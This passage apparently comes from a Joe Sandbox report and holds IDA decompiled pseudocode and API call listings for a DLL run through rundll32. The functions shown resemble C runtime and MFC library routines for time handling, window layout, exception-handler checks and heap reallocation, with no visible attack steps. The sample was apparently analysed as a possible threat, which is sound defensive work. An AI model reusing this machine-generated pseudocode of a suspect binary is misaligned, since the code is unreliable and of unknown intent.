                                                                        											asm("cdq");
                                                                        											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
                                                                        											asm("adc [ebp-0x10], edx");
                                                                        											_t120 = E10013780(_t170, _v20, 0x3c, 0);
                                                                        											 *(_t173 + 4) = _t120;
                                                                        											 *_t173 = _t170 - _t120 * 0x3c;
                                                                        											 *((intOrPtr*)(_t173 + 0x20)) = 0;
                                                                        											return _t173;
                                                                        										} else {
                                                                        											_t140 = _t112;
                                                                        											do {
                                                                        												_t146 = _t146 + 1;
                                                                        											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
                                                                        											_t138 = 0x15180;
                                                                        											goto L27;
                                                                        										}
                                                                        									}
                                                                        									L16:
                                                                        									_t168 = _t168 + _t138;
                                                                        									asm("adc dword [ebp-0x10], 0x0");
                                                                        									L20:
                                                                        									_v12 = 1;
                                                                        									goto L21;
                                                                        								}
                                                                        								asm("cdq");
                                                                        								_t152 = 0x64;
                                                                        								_t158 = _v8 % _t152;
                                                                        								if(_v8 % _t152 != 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L15;
                                                                        							}
                                                                        						}
                                                                        						_t132 = E100107B6(0x24);
                                                                        						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
                                                                        						if(_t132 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_t173 = 0x1004f744;
                                                                        						goto L10;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                          • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                          • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                          • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                          • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                        • String ID:
                                                                        • API String ID: 223281555-0
                                                                        • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                        • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E1002D821(intOrPtr __ecx, void* __edx) {
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t70;
                                                                        				signed char _t75;
                                                                        				signed int _t80;
                                                                        				signed int _t81;
                                                                        				signed int _t85;
                                                                        				signed int _t87;
                                                                        				void* _t95;
                                                                        				intOrPtr _t125;
                                                                        				intOrPtr _t133;
                                                                        				void* _t147;
                                                                        				void* _t151;
                                                                        				intOrPtr _t155;
                                                                        				void* _t158;
                                                                        				void* _t160;
                                                                        
                                                                        				_t147 = __edx;
                                                                        				_t158 = _t160 - 0xb0;
                                                                        				_t70 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                        				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
                                                                        				_t125 = __ecx;
                                                                        				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
                                                                        				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
                                                                        					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
                                                                        						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
                                                                        					}
                                                                        					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
                                                                        					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
                                                                        					 *(_t125 + 0x7c) = _t75;
                                                                        					if((_t75 & 0x00000040) == 0) {
                                                                        						_push(0x104);
                                                                        						_push(_t158 - 0x58);
                                                                        						E1002095F(_t155);
                                                                        						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
                                                                        					}
                                                                        					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
                                                                        					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
                                                                        						_t81 = _t80 & 0xfffffffe;
                                                                        					} else {
                                                                        						_t81 = _t80 | 0x00000001;
                                                                        					}
                                                                        					E100383D0(_t155, _t81);
                                                                        					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
                                                                        					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
                                                                        						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
                                                                        						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
                                                                        					}
                                                                        					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
                                                                        					if( *(_t158 + 0xbc) == 0) {
                                                                        						_t57 = _t125 + 0x94; // 0x94
                                                                        						_t150 = _t57;
                                                                        						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
                                                                        						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
                                                                        						_t85 =  *0x1004efa4; // 0x2
                                                                        						_t151 = 0;
                                                                        						_t87 =  *0x1004efa0; // 0x2
                                                                        						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
                                                                        					} else {
                                                                        						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
                                                                        						E10028E5A(_t125, _t158 - 0x68);
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
                                                                        						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
                                                                        						_push( *((intOrPtr*)(_t158 + 0xb8)));
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						 *(_t158 - 0x70) = E1002CE2A(_t125);
                                                                        						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
                                                                        						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                        						_t151 = 0;
                                                                        					}
                                                                        					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
                                                                        						E1000870E(_t155, _t125);
                                                                        					}
                                                                        					_t133 =  *((intOrPtr*)(_t155 + 0x88));
                                                                        					if(_t133 != _t125) {
                                                                        						if(_t133 != _t151) {
                                                                        							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
                                                                        								_t95 = 0;
                                                                        							} else {
                                                                        								_t95 = 1;
                                                                        							}
                                                                        							_push(_t95);
                                                                        							_push(0xffffffff);
                                                                        							goto L27;
                                                                        						}
                                                                        					} else {
                                                                        						_push(_t151);
                                                                        						_push( *(_t158 - 0x70));
                                                                        						L27:
                                                                        						_push(_t155);
                                                                        						E1002D1B2(_t133);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
                                                                        					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
                                                                        						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
                                                                        					}
                                                                        					E1002D14B(_t125, _t125, _t158, _t155);
                                                                        					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
                                                                        				}
                                                                        				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
                                                                        			}





















                                                                        APIs
                                                                        • GetWindowRect.USER32 ref: 1002D84C
                                                                        • EqualRect.USER32 ref: 1002D872
                                                                        • IsWindowVisible.USER32 ref: 1002D900
                                                                        • CopyRect.USER32 ref: 1002D93C
                                                                        • GetParent.USER32(?), ref: 1002D9FA
                                                                          • Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                        • String ID:
                                                                        • API String ID: 545338366-0
                                                                        • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                        • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10014691(signed int _a4) {
                                                                        				intOrPtr _v8;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                        				signed int _t51;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        				signed int _t55;
                                                                        				signed int _t56;
                                                                        				signed int _t57;
                                                                        				signed int* _t60;
                                                                        				intOrPtr* _t61;
                                                                        				intOrPtr _t63;
                                                                        				signed int _t64;
                                                                        				signed int* _t66;
                                                                        				signed int _t67;
                                                                        				intOrPtr _t68;
                                                                        				void* _t69;
                                                                        				signed int _t70;
                                                                        				void* _t71;
                                                                        				intOrPtr _t73;
                                                                        				void _t74;
                                                                        				signed int _t75;
                                                                        				signed int _t76;
                                                                        				short* _t77;
                                                                        				void* _t79;
                                                                        				signed int _t80;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t83;
                                                                        				intOrPtr _t88;
                                                                        				signed int _t91;
                                                                        				signed int _t92;
                                                                        				signed int _t93;
                                                                        
                                                                        				_t92 = _a4;
                                                                        				_t69 =  *(_t92 + 8);
                                                                        				if((_t69 & 0x00000003) != 0) {
                                                                        					L3:
                                                                        					return 0;
                                                                        				}
                                                                        				_a4 =  *[fs:0x18];
                                                                        				_t51 = _a4;
                                                                        				_t73 =  *((intOrPtr*)(_t51 + 8));
                                                                        				_v8 = _t73;
                                                                        				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
                                                                        					_t88 =  *((intOrPtr*)(_t92 + 0xc));
                                                                        					__eflags = _t88 - 0xffffffff;
                                                                        					if(_t88 != 0xffffffff) {
                                                                        						_t81 = 0;
                                                                        						__eflags = 0;
                                                                        						_a4 = 0;
                                                                        						_t52 = _t69;
                                                                        						do {
                                                                        							_t74 =  *_t52;
                                                                        							__eflags = _t74 - 0xffffffff;
                                                                        							if(_t74 == 0xffffffff) {
                                                                        								goto L9;
                                                                        							}
                                                                        							__eflags = _t74 - _t81;
                                                                        							if(_t74 >= _t81) {
                                                                        								L41:
                                                                        								_t56 = 0;
                                                                        								L57:
                                                                        								return _t56;
                                                                        							}
                                                                        							L9:
                                                                        							__eflags =  *(_t52 + 4);
                                                                        							if( *(_t52 + 4) != 0) {
                                                                        								_t13 =  &_a4;
                                                                        								 *_t13 = _a4 + 1;
                                                                        								__eflags =  *_t13;
                                                                        							}
                                                                        							_t81 = _t81 + 1;
                                                                        							_t52 = _t52 + 0xc;
                                                                        							__eflags = _t81 - _t88;
                                                                        						} while (_t81 <= _t88);
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L15:
                                                                        							_t53 =  *0x1004f590; // 0x0
                                                                        							_t91 = _t69 & 0xfffff000;
                                                                        							_t93 = 0;
                                                                        							__eflags = _t53;
                                                                        							if(_t53 <= 0) {
                                                                        								L18:
                                                                        								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
                                                                        								__eflags = _t55;
                                                                        								if(_t55 == 0) {
                                                                        									L56:
                                                                        									_t56 = _t55 | 0xffffffff;
                                                                        									__eflags = _t56;
                                                                        									goto L57;
                                                                        								}
                                                                        								__eflags = _v36.Type - 0x1000000;
                                                                        								if(_v36.Type != 0x1000000) {
                                                                        									goto L56;
                                                                        								}
                                                                        								__eflags = _v36.Protect & 0x000000cc;
                                                                        								if((_v36.Protect & 0x000000cc) == 0) {
                                                                        									L28:
                                                                        									_t57 = InterlockedExchange(0x1004f5d8, 1);
                                                                        									__eflags = _t57;
                                                                        									if(_t57 != 0) {
                                                                        										goto L5;
                                                                        									}
                                                                        									_t75 =  *0x1004f590; // 0x0
                                                                        									__eflags = _t75;
                                                                        									_t82 = _t75;
                                                                        									if(_t75 <= 0) {
                                                                        										L33:
                                                                        										__eflags = _t82;
                                                                        										if(_t82 != 0) {
                                                                        											L40:
                                                                        											InterlockedExchange(0x1004f5d8, 0);
                                                                        											goto L5;
                                                                        										}
                                                                        										_t70 = 0xf;
                                                                        										__eflags = _t75 - _t70;
                                                                        										if(_t75 <= _t70) {
                                                                        											_t70 = _t75;
                                                                        										}
                                                                        										_t83 = 0;
                                                                        										__eflags = _t70;
                                                                        										if(_t70 < 0) {
                                                                        											L38:
                                                                        											__eflags = _t75 - 0x10;
                                                                        											if(_t75 < 0x10) {
                                                                        												_t76 = _t75 + 1;
                                                                        												__eflags = _t76;
                                                                        												 *0x1004f590 = _t76;
                                                                        											}
                                                                        											goto L40;
                                                                        										} else {
                                                                        											do {
                                                                        												_t60 = 0x1004f598 + _t83 * 4;
                                                                        												_t83 = _t83 + 1;
                                                                        												__eflags = _t83 - _t70;
                                                                        												 *_t60 = _t91;
                                                                        												_t91 =  *_t60;
                                                                        											} while (_t83 <= _t70);
                                                                        											goto L38;
                                                                        										}
                                                                        									}
                                                                        									_t61 = 0x1004f594 + _t75 * 4;
                                                                        									while(1) {
                                                                        										__eflags =  *_t61 - _t91;
                                                                        										if( *_t61 == _t91) {
                                                                        											goto L33;
                                                                        										}
                                                                        										_t82 = _t82 - 1;
                                                                        										_t61 = _t61 - 4;
                                                                        										__eflags = _t82;
                                                                        										if(_t82 > 0) {
                                                                        											continue;
                                                                        										}
                                                                        										goto L33;
                                                                        									}
                                                                        									goto L33;
                                                                        								}
                                                                        								_t77 = _v36.AllocationBase;
                                                                        								__eflags =  *_t77 - 0x5a4d;
                                                                        								if( *_t77 != 0x5a4d) {
                                                                        									goto L56;
                                                                        								}
                                                                        								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
                                                                        								__eflags =  *_t55 - 0x4550;
                                                                        								if( *_t55 != 0x4550) {
                                                                        									goto L56;
                                                                        								}
                                                                        								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
                                                                        								if( *((short*)(_t55 + 0x18)) != 0x10b) {
                                                                        									goto L56;
                                                                        								}
                                                                        								_t71 = _t69 - _t77;
                                                                        								__eflags =  *((short*)(_t55 + 6));
                                                                        								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
                                                                        								if( *((short*)(_t55 + 6)) <= 0) {
                                                                        									goto L56;
                                                                        								}
                                                                        								_t63 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        								__eflags = _t71 - _t63;
                                                                        								if(_t71 < _t63) {
                                                                        									goto L28;
                                                                        								}
                                                                        								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
                                                                        								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
                                                                        									goto L28;
                                                                        								}
                                                                        								__eflags =  *(_t79 + 0x27) & 0x00000080;
                                                                        								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
                                                                        									goto L41;
                                                                        								}
                                                                        								goto L28;
                                                                        							} else {
                                                                        								goto L16;
                                                                        							}
                                                                        							while(1) {
                                                                        								L16:
                                                                        								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                        								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                        									break;
                                                                        								}
                                                                        								_t93 = _t93 + 1;
                                                                        								__eflags = _t93 - _t53;
                                                                        								if(_t93 < _t53) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        							__eflags = _t93;
                                                                        							if(_t93 <= 0) {
                                                                        								goto L5;
                                                                        							}
                                                                        							_t64 = InterlockedExchange(0x1004f5d8, 1);
                                                                        							__eflags = _t64;
                                                                        							if(_t64 != 0) {
                                                                        								goto L5;
                                                                        							}
                                                                        							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                        							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                        								L53:
                                                                        								_t80 = 0;
                                                                        								__eflags = _t93;
                                                                        								if(_t93 < 0) {
                                                                        									L55:
                                                                        									InterlockedExchange(0x1004f5d8, 0);
                                                                        									goto L5;
                                                                        								} else {
                                                                        									goto L54;
                                                                        								}
                                                                        								do {
                                                                        									L54:
                                                                        									_t66 = 0x1004f598 + _t80 * 4;
                                                                        									_t80 = _t80 + 1;
                                                                        									__eflags = _t80 - _t93;
                                                                        									 *_t66 = _t91;
                                                                        									_t91 =  *_t66;
                                                                        								} while (_t80 <= _t93);
                                                                        								goto L55;
                                                                        							}
                                                                        							_t67 =  *0x1004f590; // 0x0
                                                                        							_t43 = _t67 - 1; // -1
                                                                        							_t93 = _t43;
                                                                        							__eflags = _t93;
                                                                        							if(_t93 < 0) {
                                                                        								L49:
                                                                        								__eflags = _t67 - 0x10;
                                                                        								if(_t67 < 0x10) {
                                                                        									_t67 = _t67 + 1;
                                                                        									__eflags = _t67;
                                                                        									 *0x1004f590 = _t67;
                                                                        								}
                                                                        								_t46 = _t67 - 1; // 0x0
                                                                        								_t93 = _t46;
                                                                        								goto L53;
                                                                        							} else {
                                                                        								goto L46;
                                                                        							}
                                                                        							while(1) {
                                                                        								L46:
                                                                        								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                        								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                        									break;
                                                                        								}
                                                                        								_t93 = _t93 - 1;
                                                                        								__eflags = _t93;
                                                                        								if(_t93 >= 0) {
                                                                        									continue;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							__eflags = _t93;
                                                                        							if(__eflags >= 0) {
                                                                        								if(__eflags == 0) {
                                                                        									goto L55;
                                                                        								}
                                                                        								goto L53;
                                                                        							}
                                                                        							goto L49;
                                                                        						}
                                                                        						_t68 =  *((intOrPtr*)(_t92 - 8));
                                                                        						__eflags = _t68 - _v8;
                                                                        						if(_t68 < _v8) {
                                                                        							goto L41;
                                                                        						}
                                                                        						__eflags = _t68 - _t92;
                                                                        						if(_t68 >= _t92) {
                                                                        							goto L41;
                                                                        						}
                                                                        						goto L15;
                                                                        					}
                                                                        					L5:
                                                                        					_t56 = 1;
                                                                        					goto L57;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}



































                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x1001486a
                                                                        0x10014871
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014873
                                                                        0x10014873
                                                                        0x10014874
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014874
                                                                        0x10014876
                                                                        0x10014878
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001488a
                                                                        0x00000000
                                                                        0x10014878
                                                                        0x10014704
                                                                        0x10014707
                                                                        0x1001470a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014710
                                                                        0x10014712
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014712
                                                                        0x100146cf
                                                                        0x100146d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                        • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlocked$QueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2947987494-0
                                                                        • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                        • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                        • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				long _t30;
                                                                        				long _t31;
                                                                        				long _t33;
                                                                        				void* _t36;
                                                                        				long _t38;
                                                                        				long _t41;
                                                                        				long _t42;
                                                                        				long _t44;
                                                                        				long _t46;
                                                                        				void* _t59;
                                                                        				long _t61;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				_push(0x14);
                                                                        				_push(0x10041dc0);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t59 =  *(_t67 + 8);
                                                                        				if(_t59 != 0) {
                                                                        					_t61 =  *(_t67 + 0xc);
                                                                        					__eflags = _t61;
                                                                        					if(__eflags != 0) {
                                                                        						__eflags =  *0x10050a64 - 3;
                                                                        						if( *0x10050a64 != 3) {
                                                                        							while(1) {
                                                                        								_t28 = 0;
                                                                        								__eflags = _t61 - 0xffffffe0;
                                                                        								if(_t61 <= 0xffffffe0) {
                                                                        									__eflags = _t61;
                                                                        									if(_t61 == 0) {
                                                                        										_t61 = 1;
                                                                        										__eflags = 1;
                                                                        									}
                                                                        									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                        								}
                                                                        								__eflags = _t28;
                                                                        								if(_t28 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags =  *0x1004f58c; // 0x0
                                                                        								if(__eflags == 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								_t30 = E10014676(_t61);
                                                                        								__eflags = _t30;
                                                                        								if(_t30 != 0) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L36;
                                                                        							}
                                                                        							goto L37;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        						do {
                                                                        							L5:
                                                                        							 *(_t67 - 0x1c) = 0;
                                                                        							__eflags = _t61 - 0xffffffe0;
                                                                        							if(_t61 > 0xffffffe0) {
                                                                        								L25:
                                                                        								_t28 =  *(_t67 - 0x1c);
                                                                        								__eflags =  *(_t67 - 0x1c);
                                                                        								if( *(_t67 - 0x1c) != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags =  *0x1004f58c; // 0x0
                                                                        								if(__eflags == 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L27;
                                                                        							}
                                                                        							E10013A38(0, _t59, 4);
                                                                        							 *(_t67 - 4) = 0;
                                                                        							_t33 = E10013B9B(_t59);
                                                                        							 *(_t67 - 0x20) = _t33;
                                                                        							__eflags = _t33;
                                                                        							if(_t33 == 0) {
                                                                        								L21:
                                                                        								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                        								E100124B7();
                                                                        								__eflags =  *(_t67 - 0x20);
                                                                        								if( *(_t67 - 0x20) == 0) {
                                                                        									__eflags = _t61;
                                                                        									if(_t61 == 0) {
                                                                        										_t61 = 1;
                                                                        										__eflags = 1;
                                                                        									}
                                                                        									_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                        									__eflags = _t61;
                                                                        									 *(_t67 + 0xc) = _t61;
                                                                        									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                        								}
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = _t61 -  *0x10050a50; // 0x0
                                                                        							if(__eflags <= 0) {
                                                                        								_push(_t61);
                                                                        								_push(_t59);
                                                                        								_push(_t33);
                                                                        								_t41 = E1001409B();
                                                                        								_t68 = _t68 + 0xc;
                                                                        								__eflags = _t41;
                                                                        								if(_t41 == 0) {
                                                                        									_push(_t61);
                                                                        									_t42 = E1001437A();
                                                                        									 *(_t67 - 0x1c) = _t42;
                                                                        									__eflags = _t42;
                                                                        									if(_t42 != 0) {
                                                                        										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                        										 *(_t67 - 0x24) = _t44;
                                                                        										__eflags = _t44 - _t61;
                                                                        										if(_t44 >= _t61) {
                                                                        											_t44 = _t61;
                                                                        										}
                                                                        										E10011440( *(_t67 - 0x1c), _t59, _t44);
                                                                        										_t46 = E10013B9B(_t59);
                                                                        										 *(_t67 - 0x20) = _t46;
                                                                        										_push(_t59);
                                                                        										_push(_t46);
                                                                        										E10013BC6();
                                                                        										_t68 = _t68 + 0x18;
                                                                        									}
                                                                        								} else {
                                                                        									 *(_t67 - 0x1c) = _t59;
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t67 - 0x1c);
                                                                        							if( *(_t67 - 0x1c) == 0) {
                                                                        								__eflags = _t61;
                                                                        								if(_t61 == 0) {
                                                                        									_t61 = 1;
                                                                        									__eflags = 1;
